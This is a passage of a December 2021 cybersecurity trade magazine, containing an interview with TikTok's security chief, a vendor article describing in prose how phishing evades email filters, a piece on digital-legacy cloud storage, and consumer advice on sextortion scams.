<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 106<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
concern and a desire to be cautious. Though it is not enough to just want to be proactive about user<br />
privacy: actions must be taken to integrate privacy into a chatbot’s very design.<br />
About the Author<br />
Patricia Thaine is the Co-Founder and CEO of Private AI, a<br />
Toronto- and Berlin-based startup creating a suite of privacy<br />
tools that make it easy to comply with data protection<br />
regulations, mitigate cybersecurity threats, and maintain<br />
customer trust.<br />
She is a Computer Science PhD Candidate at the University of<br />
Toronto and a Postgraduate Affiliate at the Vector Institute doing<br />
research on privacy-preserving natural language processing,<br />
with a focus on applied cryptography. Her research interests also include computational methods <strong>for</strong> lost<br />
language decipherment.<br />
Patricia is a recipient of the NSERC Postgraduate Scholarship, the RBC Graduate Fellowship, the<br />
Beatrice “Trixie” Worsley Graduate Scholarship in Computer Science, and the Ontario Graduate<br />
Scholarship. She has nine years of research and software development experience, including at the<br />
McGill Language Development Lab, the University of Toronto's Computational Linguistics Lab, the<br />
University of Toronto's Department of Linguistics, and the Public Health Agency of Canada.<br />
She is also a member of the Board of Directors of Equity Showcase, one of Canada's oldest not-<strong>for</strong>-profit<br />
charitable organizations. Patricia Thaine can be reached online at patricia@private-ai.com, @PrivateNLP<br />
and at our company website https://www.private-ai.com.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 107<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Q&A: Roland Cloutier Chief Security Officer Tiktok and<br />
Bytedance<br />
By Roland Cloutier<br />
As Global Chief Security Officer of ByteDance and TikTok, Roland Cloutierbrings an unprecedented<br />
understanding and knowledge of global protection and security leadership to one of the world's leading<br />
media, social, and technology companies. He oversees the company’s in<strong>for</strong>mation protection, risk,<br />
work<strong>for</strong>ce protection, crisis management, and investigative-security operations worldwide. Be<strong>for</strong>e joining<br />
ByteDance andTikTok in 2020, Cloutier spent about 10 years as CSO at payroll-services firm ADP. Prior<br />
to ADP, he was CSO at data-storage vendor EMC (now owned by Dell). Cloutier started his career with<br />
over a decade of service to the US Air Force and US Depts. of <strong>Defense</strong> and Veterans Affairs. In 2015,<br />
he authored and published a business book, “Becoming a Global Chief Security Executive Officer.”<br />
You recently launched the #Be<strong>Cyber</strong>Smart campaign at TikTok as a part of <strong>Cyber</strong>security<br />
Awareness Month. What was the driver <strong>for</strong> doing this?<br />
At TikTok, we believe everyone benefits from a safer and more secure world. For <strong>Cyber</strong>security<br />
Awareness Month and all year long, we're inspiring our diverse global community to make good choices<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 108<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
and stay safe online. That’s why we launched #Be<strong>Cyber</strong>Smart , a campaign championed by the National<br />
<strong>Cyber</strong> Security Alliance(NCSA) and industry-leading experts on how we can all create a culture of<br />
cybersecurity. We're always inspired by creators fueling #LearnOnTikTok , and it was exciting to launch<br />
a new @TikTokTips video series on ways to spot and defend against common cyberthreats. The series<br />
features TikTok creators and employees, including touring comedian @alex_falcone telling tales of<br />
cybercrimes and how to #Be<strong>Cyber</strong>Smart.<br />
We also want to uplift the next generation of leaders. While the pandemic hit many industries hard,<br />
cybersecurity skills have never been needed more. Over 3million cybersecurity jobs went unfilled last<br />
year. We’re providing tools, training, and encouragement to inspire more people to get into cybersecurity.<br />
We've also been strengthening our security team at TikTok.<br />
We're actively recruiting <strong>for</strong> over 300 roles across 19different disciplines, because securing a plat<strong>for</strong>m<br />
that brings joy to over 1 billion people is a job that's never done.<br />
Ransomware attacks have significantly driven cybersecurity’s public profile. How have you<br />
seen this impacting internal support <strong>for</strong> cybersecurity initiatives, budgets and overall<br />
awareness with businesses?<br />
Ransomware attacks have surged 311% in the past year with a business now being attacked every 11<br />
seconds, and the threat landscape is constantly evolving. At TikTok, the safety and security of our global<br />
community is always a top priority. We know that staying ahead of next-generation cyber threats requires<br />
bolstering the security and integrity of our plat<strong>for</strong>m and business operations on an ongoing basis. Critical<br />
to that ef<strong>for</strong>t is partnering with the world's best researchers, academic scholars, and independent experts<br />
to test and validate our own defense.<br />
In the past year alone, we've strengthened our global security organization and established global Fusion<br />
Center operations in Washington DC, Dublin, and Singapore. We’ve earned ISO 27001 certifications in<br />
the US, UK, Ireland, Singapore, and India <strong>for</strong> investing in the people, processes, and technology to keep<br />
our community safe.<br />
We continue to partner with leading organizations like the National <strong>Cyber</strong> Security Alliance to inspire<br />
leaders of the future and encourage people of all backgrounds to #Be<strong>Cyber</strong>Smart<br />
While celebrating our 1-year anniversary with HackerOne and the evolution of its Internet Bug Bounty<br />
(IBB) program, we worked to spotlight the top ethical hackers helping TikTok pioneer new defenses to<br />
protect over 1 billion people worldwide. Our comprehensive scope and commitment to transparency is<br />
what keeps drawing new hackers to the program.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 109<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
What advice would you give to CISOs looking to raise cybersecurity awareness within their<br />
business and promote a ‘cyber risk’ culture?<br />
People are the foundation of any organization, and security is a team sport. At TikTok, our employees<br />
are our first line of defense. We're focused on creating a culture of security within our organization. That<br />
includes developing an internal video game to educate employees on cybersecurity and sharing<br />
@TikTokTips videos to encourage strong passwords, multi-factor authentication, and ways to spot<br />
phishing attempts. We also host a regular "Mission Possible" series with programming to engage crossfunctional<br />
teams around the world, including a friendly "Security Feud" competition to win TikTok swag<br />
<strong>for</strong> claiming the top score on a range of cybersecurity topics.<br />
We believe our ability to protect against threats is only as strong as our ability to identify and work together<br />
to address them. This fall, we hosted a global security leaders offsite, featuring guest speakers and a<br />
"field trip" to IBM's <strong>Cyber</strong> Range where our team was tested with a simulation requiring them to come<br />
together to manage seven crises simultaneously. We know it's not enough to build security into our<br />
product. We also have to test our own defenses, both as a team and with outside partners who help us<br />
continually improve the safety and security of our plat<strong>for</strong>m.<br />
You’ll be talking at next year’s Ransomware Resilience Summit series on ‘determining roles and<br />
responsibilities in a response’. How critical is it <strong>for</strong> the business to pre-determine their<br />
responses and responsibilities to an attack be<strong>for</strong>e it happens?<br />
There are a handful of sayings that I often share with my team. One is that, "we don't rise to the level of<br />
our expectations; we fall to the level of our training." Or to quote Ben Franklin, "an ounce of prevention is<br />
worth a pound of cure." It's critically important to have a plan, along with a backup plan. We have an<br />
entire team focused on business resilience and crisis management at TikTok. Their job is to anticipate<br />
worst-case scenarios and then create strategies to mitigate them.<br />
This team is part of TikTok's global Fusion Center operations, which are an important cornerstone to<br />
address the converged global threat landscape we face every day. These operations fuse critical<br />
business, security, legal, privacy, communications, and other cross-functional stakeholders to ensure<br />
alignment across all parts of the business. Our approach helps to provide a comprehensive view of how<br />
our business and community intersects with the world -- both on and off the plat<strong>for</strong>m. However, our<br />
mission is about more than protecting against malicious threats. It's also about ensuring the plat<strong>for</strong>m's<br />
availability and reliability <strong>for</strong> exciting global LIVE events like the Ultimate Super Bowl LV Pregame<br />
Experience, UFC Fight Night, TikTok UEFA EURO 2020 Show with Ed Sheeran, an innovative concert<br />
experience with The Weeknd, or an around-the-world museum tour to explore art and culture.<br />
Our all-hands, all-hazards incident management approach focuses on four pillars:<br />
1. Understanding our critical business operations, assets, services, and community<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 110<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
2. Enabling over-the-horizon threat monitoring capabilities to detect and defend threats to our<br />
business operations, assets, services, and community<br />
3. Protecting against events that negatively impact our community and business on and off plat<strong>for</strong>m<br />
4. Rapid response capabilities to minimize impact if something bad were to happen<br />
We're also creating customized, threat-led defense technology and capabilities that combine industryrecognized<br />
frameworks like VERIS, MITRE ATT&CK, CSF, Data <strong>Defense</strong>, and ISO 27001. As the threat<br />
and cybercriminal landscape changes, so are we by building new protocols and systems to detect,<br />
manage, triage, and escalate all types of security events spanning ransomware, organized cyber crime,<br />
and inauthentic behavior. Our multidisciplinary approach enables us to catch and eliminate potential<br />
security and safety incidents or adversaries be<strong>for</strong>e they put our plat<strong>for</strong>m or community at risk.<br />
What are you most looking <strong>for</strong>ward to by being a part of the Ransomware Resilience Summit<br />
series?<br />
Roland will be speaking alongside 30+ other experts at the upcoming Ransomware Resilience Summit<br />
series (London, February 22-23 and Washington D.C., March 29-30). Limited places are available to join<br />
TikTok, Netflix, Bupa, Microsoft, Oracle, Aston Martin, Trainline and many more behind closed doors and<br />
share best practices and lessons learned <strong>for</strong> tackling the unabating ransomware threat.<br />
It's critical <strong>for</strong> the business community to get together, educate, and connect with one another. Industry<br />
<strong>for</strong>ums like the Ransomware Resilience Summit are important because they bring together key<br />
stakeholders -- from security practitioners to law en<strong>for</strong>cement officials -- to share lessons learned and<br />
enable stronger defenses. The ability to connect digitally and in real-time is not just important, but maybe<br />
the most important driver of economic opportunity and change in our lifetime. The more we can learn<br />
from and uplift one another, the safer and more secure our world will be. I look <strong>for</strong>ward to sharing the<br />
stage with fellow practitioners next year and continuing these important conversations.<br />
With <strong>Cyber</strong> Security Awareness month behind us, what do you have planned <strong>for</strong> the<br />
#Be<strong>Cyber</strong>Smart campaign moving <strong>for</strong>ward?<br />
<strong>Cyber</strong>security Awareness Month may be over, but we aim to encourage online safety year round. For<br />
International Fraud Awareness Week (November 14 - 20), we're joining the Association of Certified Fraud<br />
Examiners (ACFE) as a continuation of our #Be<strong>Cyber</strong>Smart campaign. We're hosting a special<br />
#LearnOnTikTok LIVE stream on November 15 in conversation with @Alex_Falcone and industry experts<br />
sharing tips on how to avoid falling victim to fraud, because fraud is not a victimless crime. In the physical<br />
world, we follow expert guidance: "If you see something, say something." The same principle applies to<br />
the digital world, and people with cybersecurity skills have the power to protect those around them by<br />
sharing their expertise. We're welcoming security practitioners and companies across all industries to<br />
join us in creating TikTok videos to help others #Be<strong>Cyber</strong>Smart.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 111<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Interviewer<br />
Aaron Rawcliffe<br />
Profile Director<br />
Ransomware Resilience Summit<br />
Kisaco Research<br />
Interviewee<br />
Roland Cloutier<br />
Global Chief Security Officer<br />
ByteDance/ Tik Tok<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 112<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Techniques Used by Hackers to Bypass Email Security<br />
Solutions<br />
By Michael Aminov, Perception Point<br />
There are many email security solutions available in the market today, yet organizations still see phishing<br />
and malware reach users. In some situations, a SOC team may get a report sent by an employee.<br />
However, when the payload has reached the users’ computer and has been opened, what normally<br />
happens is an alert coming from the endpoint solution. Even worse, the organization becomes<br />
compromised - data can be stolen or encrypted, and business processes are in danger of major<br />
disruption.<br />
This article will look at the most-used techniques that hackers choose to bypass traditional email security<br />
solutions.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 113<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Hosting malware on file-sharing services<br />
Cloud storage and data sharing applications such as OneDrive, Google Drive, SharePoint are creating<br />
an increasing number of security blindspots <strong>for</strong> hackers to leverage.<br />
Many file-sharing services offer free packages, which let an attacker upload a payload <strong>for</strong> free. These<br />
services work by using link sharing, and the link then comes from their domain which has a good<br />
reputation. The attacker crafts an email and puts the link inside an email.<br />
Why is this so difficult to detect?<br />
Traditional solutions scan the URL. In these cases, there is nothing suspicious inside, as the link will lead<br />
to the legit website. The site itself is safe but when the user clicks on a “download” button the malicious<br />
file is activated and your user is compromised.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 114<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Phishing scams avoid email security with login <strong>for</strong>ms hidden inside local web pages<br />
In this case, the hacker leverages a login page inside a local html page, which is attached to the email<br />
instead of hosting the login page online. And when you open the HTML attachment, any JavaScript inside<br />
the HTML will be allowed to run by default by your browser. The page is rendered locally on the victim’s<br />
computer, and only after credentials are entered into the fake login page, a JavaScript code (usually<br />
obfuscated) uploads this in<strong>for</strong>mation online straight to the attackers’ hands.<br />
Why is this difficult to detect?<br />
• The email does not contain an embedded link that could be unpacked and scanned. All engines<br />
based on reputation (URL reputation, domain legitimacy and so on) are not valid. Also solutions<br />
such as URL rewriting in Office365 will not help.<br />
• The URL in the address bar seems as if it is harmless, with no website name.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 115<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Spotting Spear Phishing<br />
Attackers try to trick users into thinking they landed on a well-known internal company portal. The attacker<br />
identifies a third-party service that a company uses, and mimics it with fake versions of it.<br />
Why is this difficult to detect?<br />
• Employees expect to see emails from these sources as internal only, and will not pay attention to<br />
signs of phishing.<br />
• Some company portals are accessed from the internet—making hackers’ lives even easier to<br />
spoof them.<br />
In the below example, we can see a fake Okta login page. It contains all visual elements and the<br />
company’s logo (and its even SSL encrypted), just waiting <strong>for</strong> the user to enter his or her credentials (an<br />
action done several times a day). A large portion of phishing campaigns sent to companies are actually<br />
an impersonation of their own brand.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 116<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
ATO Detection<br />
Account takeover benefits from the account’s credibility and history with their own company and external<br />
organizations that they do business with. A fraudster who has access to an account can cause<br />
tremendous damage.<br />
Why is this difficult to detect?<br />
• With ATO, the email is coming straight from the vendor’s IP and the actual sender’s mailbox.<br />
• The attacker will read the email communications, and wait <strong>for</strong> the perfect time to inject a message<br />
<strong>for</strong> fund transfer. He will usually reply back with a signature that’s identical to the vendor’s and<br />
will ask <strong>for</strong> you to transfer money to other bank accounts.<br />
Blacklisting email security vendor IP addresses<br />
Hackers blacklist email security vendors’ IP addresses. They create phishing websites, being aware that<br />
their target is highly <strong>for</strong>tified, and they assume email security solutions will scan their website be<strong>for</strong>e it<br />
will reach the end user.<br />
Why is this difficult to detect?<br />
By fingerprinting the different email security solutions, a hacker can understand what the IP addresses<br />
are of the email security provider services. Once fingerprinted, they can easily blacklist that IP.<br />
Recommendations<br />
1) When selecting an email security solution, an organization should consider a service that identifies<br />
all threats be<strong>for</strong>e they arrive in a user’s inbox. The ideal solution should provide various detection<br />
layers to identify advanced phishing attacks as well as ATO, malware, 0-days and more.<br />
Look <strong>for</strong> services that:<br />
• Dynamically scan 100% of emails and their embedded content be<strong>for</strong>e they arrive to the user’s<br />
inbox without affecting user experience<br />
• Use technology to deterministically provide verdicts on malware and not rely on behavioral<br />
analysis<br />
• Leverage image analysis Image recognition of URLs<br />
• Can detect account takeover detection<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 117<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
2) Educate your employees to always check the authenticity of the sender by checking if the display<br />
name and the email address match in order to decrease the chance of a successful spoofing attempt<br />
3) Avoid clicking links if you are not sure about them. If you click a link from an email, inspect the website<br />
even if it seems to display non-malicious content.<br />
4) Be<strong>for</strong>e giving away details, always check if the domain is known to you and that the website is<br />
protected by SSL (HTTPS and not HTTP).<br />
About the Author<br />
Michael Aminov is the founder and chief<br />
architect of Perception Point. Previously, he<br />
was the chief architect of CyActive, acquired by<br />
PayPal. Michael was also an officer in the<br />
classified elite cyber unit in the Israeli<br />
Intelligence Corps and was awarded the Israeli<br />
National Security Award.<br />
https://perception-point.io<br />
Michael.aminov@perception-point.io<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 118<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How To Protect Your Digital Legacy<br />
By Jamie Wilson, MD, Cryptoloc Technology Group<br />
From your birth certificate to your will, much of your life is lived on paper – and now, that paper is moving<br />
to the cloud. But while there are clear advantages to digitising our most important documents, there’s<br />
also an art to doing it properly. Here’s how you can move your records online safely and securely, and<br />
ensure you’re able to pass your digital legacy on when the time comes.<br />
Why should you digitize your documents?<br />
Over the course of our lives, we accrue a lot of documents that need to be stored safely – everything<br />
from contracts, wills, trust deeds, share portfolios, property and vehicle leases, insurance policies, tax<br />
returns, power of attorney documents and funeral plans to hard-earned degree certificates, precious<br />
family photos and spicy love letters.<br />
But if you’re relying on paper documents, then you could be setting yourself up <strong>for</strong> disaster – quite literally,<br />
in the case of a fire, flood or even a tornado. Even if you avoid that worst-case scenario, in<strong>for</strong>mation<br />
stored in physical <strong>for</strong>mats will deteriorate a little further every time it’s handled, so it’s essential to preserve<br />
paper documents by scanning and converting them into digital files.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 119<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
If you’re running a business, then the number of documents and records that you need to keep track of<br />
grows exponentially. And the more you’re relying on paper-based processes, the less efficient your<br />
business will be on a day-to-day basis – especially if your business is geographically dispersed across<br />
multiple locations, or, like so many businesses today, you have employees working remotely.<br />
Ditching those bulky filing cabinets and replacing them with digital files that are quickly and easily<br />
searchable and accessible will enable you to save time, improve productivity and reduce operating costs<br />
now, while also putting you in good stead <strong>for</strong> the future.<br />
Of course, it’s one thing to have digital records of all your documents. But the real question is how you<br />
can store and share these files securely, because if you can’t do that, you may as well have just set all<br />
that paper on fire yourself.<br />
And perhaps most importantly, you need to ensure that the right people – and only the right people – are<br />
able to access those files when you’re not around to share them anymore. Because ultimately, that’s<br />
what your digital legacy is all about.<br />
Clouding the issue: Securing your digital legacy<br />
To get value out of going digital, you need to store your files in a system that’s both easy to manage and<br />
truly secure. This is something I found out the hard way.<br />
I was working as an accountant when my father passed away from pancreatic cancer in 2010, leaving<br />
me with the task of rounding up and managing his will, superannuation details and other legal documents<br />
and files <strong>for</strong> my mother.<br />
Losing a loved one is extremely hard – in some cases, it might be the hardest thing you ever go through.<br />
And, though it’s never been easier to digitise our documents, it can be overwhelming <strong>for</strong> our next of kin<br />
to track down and gain access to these documents at a time when they’re already distressed.<br />
It’s not something we tend to think about – or, <strong>for</strong> that matter, something we want to think about – but it’s<br />
important that we can easily pass on this in<strong>for</strong>mation when we pass away.<br />
Knowing that data storage devices like hard drives and thumb drives were no safer in the event of a<br />
natural disaster than paper documents (and much easier to lose), I went looking <strong>for</strong> a secure cloud-based<br />
solution – and ended up having to create my own.<br />
I didn’t want other people to have the same challenges that I did in such a difficult time. I was also thinking<br />
about my accounting clients at the time. What if something happened to me? I had ownership of all their<br />
business strategy and financial documents, which they likely wouldn’t have gotten back. That could have<br />
crippled their businesses.<br />
I thought there had to be a solution on the market that enabled businesses and individuals to own their<br />
data; to create digital documents that would stand up in court as well as the paper-based originals; and<br />
to nominate a party or parties to be able to access the documents in the event of a loss. But I found that<br />
this technology and this level of security simply did not exist, so I set off on my journey to create both.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 120<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
I worked with cybersecurity experts, mathematicians and encryption specialists to develop Cryptoloc’s<br />
patented three-key encryption technology, which combines three different encryption algorithms into one<br />
unique multilayer process, and deployed it across several products.<br />
One of those products is Cryptoloc Cloud, a secure cloud storage service, which enables users to safely<br />
store, edit, share and sign documents with complete confidence; files can only be accessed by the people<br />
the user authorises; and every change is tracked.<br />
These fully encrypted documents can then be sent to clients, customers, lawyers, government<br />
departments and anyone else who needs them, directly from Microsoft Outlook.<br />
But what I’m proudest of is that Cryptoloc Cloud enables users to create a true data legacy – their files<br />
are preserved, but not just anyone can access them. Instead, files can only be accessed by users<br />
nominated by the deceased be<strong>for</strong>e their passing. This is a feature that any cloud storage service that’s<br />
serious about preserving a person’s digital legacy needs to offer.<br />
In our case, the system enables users to nominate a person – such as a loved one or executor – to<br />
access their data in the event of their death, incapacitation, or another trigger event of their choosing.<br />
Users can nominate the person to be able to access as many, or as few, of their files as they like – if they<br />
don’t want to hand over their entire digital legacy to one person, they can specify which of their drives<br />
they’d like them to receive, and/or nominate multiple people.<br />
Cryptoloc isn’t the only cloud storage service to consider a user’s digital legacy. Google’s Inactive<br />
Account Manager, <strong>for</strong> instance, enables users who have data saved on Google services to assign their<br />
data to a digital executor when their account become inactive, and Apple have just introduced a Digital<br />
Legacy feature that enables users to set a person as their Legacy Contact, giving that person access to<br />
their Apple ID account and data after they die.<br />
I’m pleased to see more services realising the importance of a Digital Legacy feature, but many cloud<br />
storage providers still don’t offer one. Instead, users are required to include an e-register of digital assets<br />
with their will, despite the fact that digital estate planning legislation is largely uncharted territory, and the<br />
legal rights that apply to our physical possessions or financial assets don’t yet apply to our digital assets<br />
in most jurisdictions.<br />
Some services actively prohibit the sharing of usernames and passwords, and the transferring of data<br />
between accounts – so leaving it to the courts to en<strong>for</strong>ce your wishes is a legal minefield.<br />
The benefits of being able to simply nominate someone to inherit files you’ve stored in the cloud, directly<br />
through the service itself, are obvious. For instance, if you’re an estate lawyer, you can assist your clients<br />
to set up their own data legacy, and nominate you – or a loved one of their choosing – to receive their<br />
will and their other legal documents upon their passing.<br />
Conversely, you can ensure that the documents you’re holding onto yourself can be safely passed on to<br />
another lawyer, or to your clients themselves, when the time comes.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 121<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
This is, after all, the whole reason I set out to create Cryptoloc in the first place. It’s personally very<br />
satisfying to know that users can store all their important documents securely in one place, and establish<br />
a digital legacy that they can easily pass on to the people that they choose.<br />
Nobody should have to go through the hassle of putting a loved one’s affairs in order while they’re grieving<br />
<strong>for</strong> them and now, nobody does.<br />
About the Author<br />
Jamie Wilson is the founder and chairman of Cryptoloc,<br />
recognised by Forbes as one of the 20 Best<br />
<strong>Cyber</strong>security Startups to Watch in 2020.<br />
Headquartered in Brisbane, Australia, with offices in<br />
Japan, US, South Africa and the UK, Cryptoloc have<br />
developed the world’s strongest encryption technology<br />
and the world’s safest cybersecurity plat<strong>for</strong>m, ensuring<br />
clients have complete control over their data. Jamie can<br />
be reached online at www.linkedin.com/in/jamie-wilson-<br />
07424a68 and at www.cryptoloc.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 122<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Sextortion Email Scams<br />
What to Do and How to Respond<br />
By Harman Singh, director at Cyphere<br />
Sextortion emails scams are becoming more common, but how can you tell if it's a legitimate request <strong>for</strong><br />
money or an actual sextortion scam? Here are some signs to a lookout. First off, if the person is asking<br />
<strong>for</strong> money in order to send pictures back, this is most likely a scam. Second, if the sender threatens<br />
physical violence against you or your loved ones unless you pay up right away- delete them immediately!<br />
Scammers may access your in<strong>for</strong>mation through a phishing attempt or any other hacking technique.<br />
Finally, be<strong>for</strong>e paying any of these scammers any amount of money, please read about such scams<br />
online, especially your individual country’s law en<strong>for</strong>cement websites, action fraud websites, and consult<br />
with someone who knows about internet security.<br />
What is a sextortion email?<br />
A sextortion scam uses blackmail to coerce the potential victim into paying money under the threat of<br />
publishing or threatening physical violence. The scammers will most often use the photos they've<br />
obtained illegally as leverage <strong>for</strong> this type of cybercrime.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 123<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
In a sextortion scam, someone contacts you online with the intention of extorting money from you. They<br />
might say they have compromising photos or videos of you and threaten to send them out unless a<br />
ransom is paid.<br />
What should I do if I'm receiving sextortion emails?<br />
If you're receiving an email like this, delete it immediately. Never send any money or share your personal<br />
in<strong>for</strong>mation with the sender. If you fear someone may have actually accessed your email account and<br />
taken compromising pictures of yourself, make sure to contact law en<strong>for</strong>cement officials as soon as<br />
possible <strong>for</strong> help in getting those images cleaned from the website where they were posted without<br />
consent.<br />
What is a sextortion attack?<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 124<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Sextortion attacks are a type of cyber-attacks that successfully gains access to sensitive in<strong>for</strong>mation from<br />
the potential victim, such as pictures or videos. The attacker then uses this knowledge to coerce them<br />
into per<strong>for</strong>ming other actions by using fear and intimidation.<br />
The attacker will threaten to release the in<strong>for</strong>mation publicly if they do not comply with their requests.<br />
This is among the scariest <strong>for</strong>ms of cyber-attacks because it can cause real-life damage and ruin a<br />
person's reputation, even though no physical harm was done directly.<br />
Prevention tips against sextortion scams<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 125<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
We have shared a few tips <strong>for</strong> preventing sextortion scams.<br />
1. Use burner email addresses, also known as disposable email addresses <strong>for</strong> temporary online<br />
accounts.<br />
2. Don't share any photos that you think can be misused against you. If you aren’t sure, don’t do it even<br />
with someone you trust.<br />
3. Never send money to someone who contacts you unexpectedly.<br />
4. If the person is asking <strong>for</strong> money in order to send pictures back, this is most likely a scam.<br />
5. Do not give out personal data ever! If they know where you live and have your full name, it's even<br />
easier <strong>for</strong> them to extort more from you using fear.<br />
6. Do not ever share any personal in<strong>for</strong>mation with anyone online.<br />
7. If you fear someone may have actually accessed your account and taken compromising pictures of<br />
yourself, contact the authorities and check your local law en<strong>for</strong>cement official websites. Ask <strong>for</strong> help in<br />
getting those images removed.<br />
8. Use two-factor authentication on all accounts.<br />
9. Always use secure passwords with both letters and numbers, so it's harder to guess or hack your<br />
account. Use a password manager <strong>for</strong> easy handling of all your passwords<br />
10. Create a unique secure password <strong>for</strong> every website (especially social media) using a password<br />
manager. If possible, use a password manager to store all your secrets and generate them randomly<br />
when required.<br />
11. Set up automatic security alerts, so you know if your accounts have been accessed by someone<br />
other than yourself.<br />
12. Don't open emails from unknown people, and always check the link associated with it, look out <strong>for</strong><br />
the red flags such as hyphens in the address, typo squatting errors or too good to be true offers giving<br />
away hints about a possible scam.<br />
How will I know if I'm being targeted by a sextortion email scam?<br />
Sextortion scams have several different warning signs to look out <strong>for</strong>. If the sender asks you <strong>for</strong> money<br />
in order to send pictures back, this is most probably a scam and should be deleted immediately.<br />
Scammers also often use threats of physical violence or public humiliation as leverage against the<br />
potential victim. If you ever receive a sextortion email like this, delete it and do not send any money to<br />
the sender. Most importantly, if someone is threatening physical violence or your loved ones unless you<br />
pay up- contact law en<strong>for</strong>cement officials right away!<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 126<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How to respond to a sextortion email?<br />
If you've already received a sextortion email, the most important thing to do is delete it immediately. Never<br />
send any money or share your sensitive in<strong>for</strong>mation with the sender, and if possible, contact law<br />
en<strong>for</strong>cement officials <strong>for</strong> help in getting those images removed from wherever they were posted without<br />
consent.<br />
What should you do after receiving a sextortion email?<br />
You need to be very careful after receiving such an email. Following steps should be taken after you<br />
receive any sextortion email<br />
1. Change password<br />
2. Update security alerts on accounts<br />
3. Delete the email right away without responding to the sender<br />
4. Stay calm<br />
5. Change password and alert IT<br />
6. Don't send money to any scammer<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 127<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
